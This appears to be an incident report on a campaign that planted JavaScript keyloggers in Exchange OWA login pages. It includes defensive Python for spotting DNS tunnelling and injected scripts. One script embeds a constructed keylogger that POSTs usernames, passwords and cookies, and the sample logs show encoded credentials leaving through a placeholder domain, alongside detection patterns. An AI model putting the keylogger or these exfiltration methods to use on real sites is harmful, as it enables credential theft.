Full Report
Unidentified threat actors have been observed targeting publicly exposed Microsoft Exchange servers, injecting malicious code into the login pages in order to harvest users' credentials. Positive Technologies, in a new analysis published last week, said it identified two different kinds of keylogger code written in JavaScript on the Outlook login page: those that save collected data to a local file
Analysis Summary
# Incident Report: Microsoft Exchange Credential Harvesting Campaign
## Executive Summary
Unidentified actors have been systematically targeting publicly exposed Microsoft Exchange servers across 26 countries, exploiting known vulnerabilities (like ProxyShell) to inject JavaScript keyloggers into the Outlook web login pages. This campaign, a continuation of activity first noted in May 2024, aims to steal user credentials. The resulting impact includes credential theft and potential downstream compromise, with response actions typically involving patching the exploited vulnerabilities and cleaning the compromised web pages.
## Incident Details
- Discovery Date: Positive Technologies published its analysis in the week before June 24, 2025 (described in the source as "last week").
- Incident Date: Evidence suggests compromises dating back to 2021, with the current observed campaign continuing from May 2024.
- Affected Organization: Over 70 organizations globally, including government agencies, banks, IT companies, and educational institutions.
- Sector: Mixed (Government, Financial, IT, Education).
- Geography: 26 countries worldwide.
## Timeline of Events
### Initial Access
- Date/Time: Ongoing since at least 2021; the currently tracked wave of the campaign has been observed since May 2024.
- Vector: Exploitation of known Microsoft Exchange Server vulnerabilities, specifically the ProxyLogon and ProxyShell chains (e.g., CVE-2021-34523, part of ProxyShell).
- Details: Attackers exploit flaws to achieve persistent access and inject code onto the Outlook login page.
### Lateral Movement
- Details: Not explicitly detailed, but the acquisition of high-value credentials (from keylogging) strongly implies subsequent lateral movement to access sensitive data or internal resources.
### Data Exfiltration/Impact
- Details: Stolen credentials from the login form. Two primary methods identified:
1. **Local File Storage:** Harvested data is written to a file on the compromised server that is itself reachable over the internet, so the attacker collects it by simply requesting that URL and the server never has to initiate an outbound connection. This variant was also seen collecting cookies, User-Agent strings, and timestamps.
2. **Immediate Exfiltration:** Data is sent out as soon as it is captured. In one observed form the page issues an XHR request to a handler page on the compromised Exchange server itself, which relays the data onward. More advanced variants sent the data to a Telegram bot, or combined DNS tunneling with HTTPS POST requests, so that the exfiltration blends in with ordinary egress traffic.
### Detection & Response
- Detection: Identified by Positive Technologies through analysis of deployed malicious JavaScript on Exchange login pages.
- Response: Actions focus on patching the underlying vulnerabilities and removing the malicious code.
## Attack Methodology
- Initial Access: Exploitation of Microsoft Exchange Server RCE/Bypass vulnerabilities (e.g., ProxyShell, ProxyLogon).
- Persistence: The keylogger is written into the server-side files of the Outlook authentication page, so it survives restarts and is served to every user who loads the form until the page is cleaned.
- Privilege Escalation: Not explicitly detailed, but RCE vulnerabilities were leveraged for initial access.
- Defense Evasion: The local-file variant produces no outbound traffic from the server at all. The exfiltrating variants hide in traffic that looks legitimate: a request to a page on the Exchange server itself, HTTPS to the Telegram Bot API with bot credentials carried in request headers, or DNS tunneling combined with HTTPS POST requests.
- Credential Access: Keylogging via malicious JavaScript monitoring the authentication form input.
- Discovery: Not explicitly detailed, assumed standard internal reconnaissance post-exploitation.
- Lateral Movement: Implied through credential harvesting to access other network resources.
- Collection: Harvesting login credentials, user cookies, User-Agent strings, and timestamps (in some variants).
- Exfiltration: XHR requests to a handler page, direct egress to a Telegram bot API, or DNS tunneling.
- Impact: Credential theft, potential loss of sensitive organizational data.
## Impact Assessment
- Financial: Not quantified in the source; exposure is elevated given that banks and government agencies are among the victims.
- Data Breach: User credentials for Outlook/Exchange accounts were successfully harvested.
- Operational: Potential disruption resulting from compromised accounts and subsequent secondary attacks.
- Reputational: High, given the targeting of government and financial entities.
## Indicators of Compromise
- Network Indicators: The source publishes no specific domains, IP addresses, or hashes. The observable patterns are XHR requests from the login page to an unexpected page on the *compromised Exchange Server itself*, and HTTPS POST requests carrying APIKey and AuthToken headers to a Telegram bot instance.
- File Indicators: Malicious JavaScript embedded within Outlook login pages.
- Behavioral Indicators: Creation of an unexpected, web-reachable file on the Exchange server that grows with each login attempt; unexpected modification times on the OWA logon page files; long, high-entropy or high-volume DNS queries to a single domain, indicative of DNS tunneling.
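As an added example that is not part of the Positive Technologies analysis, the Python below runs the two network-side indicators over constructed resolver log lines: it scores the leftmost DNS label by length and Shannon entropy to surface the encoded chunks typical of tunnelled queries, counts distinct subdomains per registered domain, and matches the Telegram Bot API host api.telegram.org. The log format, the thresholds and every *.invalid hostname are assumptions made for the example.

```python
"""Heuristic review of resolver logs for DNS tunnelling and Telegram Bot API egress.

Added example for this report, not code from the source analysis. Log format
("<timestamp> <client-ip> <qname>") and all hostnames are constructed; the
*.invalid names never resolve on the real internet.
"""
import math
from collections import defaultdict

SAMPLE_DNS_LOG = """\
2025-06-18T09:12:01Z 10.0.0.5 mail.example-corp.invalid
2025-06-18T09:12:02Z 10.0.0.5 autodiscover.example-corp.invalid
2025-06-18T09:12:03Z 10.0.0.5 dGVzdHVzZXJAZXhhbXBsZS5jb206UGFzc3dvcmQxMjM.a1b2c3d4e5f6.t.exfil-example.invalid
2025-06-18T09:12:04Z 10.0.0.5 cGFzc3dvcmQ0NTY3ODkwYWJjZGVm.t.exfil-example.invalid
2025-06-18T09:12:05Z 10.0.0.5 api.telegram.org
2025-06-18T09:12:06Z 10.0.0.7 www.microsoft.com
"""

# api.telegram.org is the real host behind the Telegram Bot API.
EGRESS_WATCHLIST = {"api.telegram.org"}

# Thresholds are assumptions; tune them against your own baseline before alerting.
MIN_LABEL_LEN = 20        # encoded payload chunks are long ...
MIN_LABEL_ENTROPY = 3.5   # ... and close to random (bits per character)
MAX_QNAME_LEN = 60        # or the whole name is unusually long


def shannon_entropy(s):
    """Bits per character of s (0.0 for an empty or single-symbol string)."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_log(text):
    """Yield (timestamp, client, qname) tuples, skipping blank or malformed lines."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 3:
            yield parts[0], parts[1], parts[2].lower().rstrip(".")


def base_domain(qname):
    """Registered domain approximated as the last two labels (a real tool should use the public suffix list)."""
    return ".".join(qname.split(".")[-2:])


def analyse_dns_log(text):
    """Return tunnelling suspects, watchlist hits and distinct-subdomain counts per registered domain."""
    tunnel_suspects, watchlist_hits = [], []
    unique_labels = defaultdict(set)
    for _ts, _client, qname in parse_log(text):
        if qname in EGRESS_WATCHLIST:
            watchlist_hits.append(qname)
        labels = qname.split(".")
        if len(labels) < 3:
            continue  # bare registered domain: no subdomain to tunnel through
        leftmost = labels[0]
        unique_labels[base_domain(qname)].add(leftmost)
        long_label = len(leftmost) >= MIN_LABEL_LEN and shannon_entropy(leftmost) >= MIN_LABEL_ENTROPY
        if len(qname) > MAX_QNAME_LEN or long_label:
            tunnel_suspects.append(qname)
    return {
        "tunnel_suspects": tunnel_suspects,
        "watchlist_hits": watchlist_hits,
        "unique_subdomains": {d: len(s) for d, s in unique_labels.items()},
    }


if __name__ == "__main__":
    for key, value in analyse_dns_log(SAMPLE_DNS_LOG).items():
        print(key, value)
```

The two tunnelled queries trip different rules (the first by total length, the second by label entropy), while the short `mail` and `autodiscover` labels do not. The APIKey/AuthToken headers mentioned above are not visible in DNS logs; matching them needs proxy or TLS-inspection logs, so the watchlist hit on api.telegram.org is the signal this check can give.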
## Response Actions
- Containment: Patch the exploited Exchange Server vulnerabilities (ProxyLogon/ProxyShell) so the injection cannot simply be repeated, and remove the injected script from the login page, restoring the page from installation media or a known-good copy. For the local-file variant, also delete the drop file after preserving a copy for forensics.
- Eradication: Removing the keylogging mechanism from the affected Exchange server files.
- Recovery: Forcing password resets for all potentially compromised accounts, reviewing access logs for evidence of lateral movement.
## Lessons Learned
- Known vulnerabilities in widely deployed software (like Exchange Server) remain high-value entry points for prolonged, multi-year campaigns.
- Web application security must account for injection into client-side code (JavaScript) used in authentication flows.
- Attackers are varying their exfiltration channels (DNS tunneling, abuse of legitimate third-party services such as Telegram) to slip past egress filtering that only blocks known-bad destinations.
## Recommendations
- Immediately patch all known Microsoft Exchange vulnerabilities, prioritizing RCEs (ProxyLogon/ProxyShell).
- Implement egress filtering and monitoring to detect anomalous traffic patterns, especially DNS tunneling and connections to legitimate third-party services that can be abused for exfiltration (such as the Telegram Bot API).
- Audit the login pages of all critical web applications for embedded, undocumented JavaScript capable of harvesting credentials, and compare the served pages against a known-good baseline (file hashes or file integrity monitoring) so that any injection is caught as drift rather than by pattern matching alone.
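As an added example (not code from the Positive Technologies report or from Microsoft), the Python script below implements the page-audit recommendation: it pulls every inline `<script>` out of an OWA logon page, flags those that read the login form, hook a submit or key event, and contain a network-send primitive, and hashes the page for comparison against a known-good baseline. The page markup, the injected script and the handler path `/owa/auth/auth.js` are constructed for the example; the real file to scan is `<ExchangeInstallPath>\FrontEnd\HttpProxy\owa\auth\logon.aspx`, and the same check should cover the other .aspx files in that directory.

```python
"""Flag credential-harvesting JavaScript injected into an OWA logon page.

Added example for this report; not code from Positive Technologies or Microsoft.
The markup below is a constructed, stripped-down stand-in for logon.aspx with
one injected inline script of the "immediate exfiltration" kind. On a real
server the page lives at <ExchangeInstallPath>\\FrontEnd\\HttpProxy\\owa\\auth\\logon.aspx.
"""
import hashlib
import re

# Constructed known-good page: one external script (normal for OWA) and one
# harmless inline script that touches the username field but hooks nothing.
CLEAN_PAGE = """<html><body>
<form name="logonForm" action="/owa/auth.owa" method="post">
  <input id="username" name="username" type="text">
  <input id="password" name="password" type="password">
  <input type="submit" value="sign in">
</form>
<script src="/owa/auth/15.2.1258/scripts/premium/flogon.js"></script>
<script>document.getElementById("username").focus();</script>
</body></html>
"""

# Constructed injection: hooks the form submit and ships the values (plus the
# session cookie) to a handler page on the same host, like the relay variant.
INJECTED_SCRIPT = """<script>
var f = document.forms.logonForm;
f.addEventListener("submit", function () {
  var x = new XMLHttpRequest();
  x.open("POST", "/owa/auth/auth.js", true);
  x.send(JSON.stringify({u: f.username.value, p: f.password.value, c: document.cookie}));
});
</script>"""
SAMPLE_PAGE = CLEAN_PAGE.replace("</body>", INJECTED_SCRIPT + "\n</body>")

# Inline <script> blocks only; external scripts are verified separately by path and hash.
INLINE_SCRIPT = re.compile(r"<script(?![^>]*\bsrc=)[^>]*>(.*?)</script>", re.I | re.S)
# The three things a form keylogger must do: read the form, hook an event, send the data.
FORM_ACCESS = re.compile(r"password|username|logonForm|\.value\b|document\.cookie", re.I)
HOOKS = re.compile(
    r"addEventListener\s*\(\s*[\"'](?:submit|key(?:down|press|up)|input|change)"
    r"|\bon(?:submit|key\w+|input|change)\s*=", re.I)
EXFIL = re.compile(r"XMLHttpRequest|\bfetch\s*\(|sendBeacon|api\.telegram\.org|new\s+Image\s*\(|\.src\s*=", re.I)


def find_suspicious_scripts(html):
    """Return bodies of inline scripts that read form input, hook an event and contain an exfil primitive."""
    hits = []
    for body in INLINE_SCRIPT.findall(html):
        if FORM_ACCESS.search(body) and HOOKS.search(body) and EXFIL.search(body):
            hits.append(body.strip())
    return hits


def page_digest(html):
    """SHA-256 over whitespace-normalised markup, for comparison with a known-good baseline."""
    normalised = re.sub(rb"\s+", b" ", html.encode("utf-8")).strip()
    return hashlib.sha256(normalised).hexdigest()


def scan_file(path, baseline_digest=None):
    """Scan one logon page on disk: pattern hits plus whether it drifted from the baseline hash."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        html = fh.read()
    return {
        "suspicious_scripts": find_suspicious_scripts(html),
        "drifted": baseline_digest is not None and page_digest(html) != baseline_digest,
    }


if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", SAMPLE_PAGE)):
        print(name, page_digest(page)[:16], len(find_suspicious_scripts(page)), "suspicious script(s)")
```

The regexes are a triage filter, not a parser: an obfuscated or split-up script can evade all three patterns, which is why the baseline hash from `page_digest` is the authoritative check and the pattern match only tells the responder which block to read first. Either keylogger variant described above has to hook the form and send the values somewhere, so the same filter applies to both.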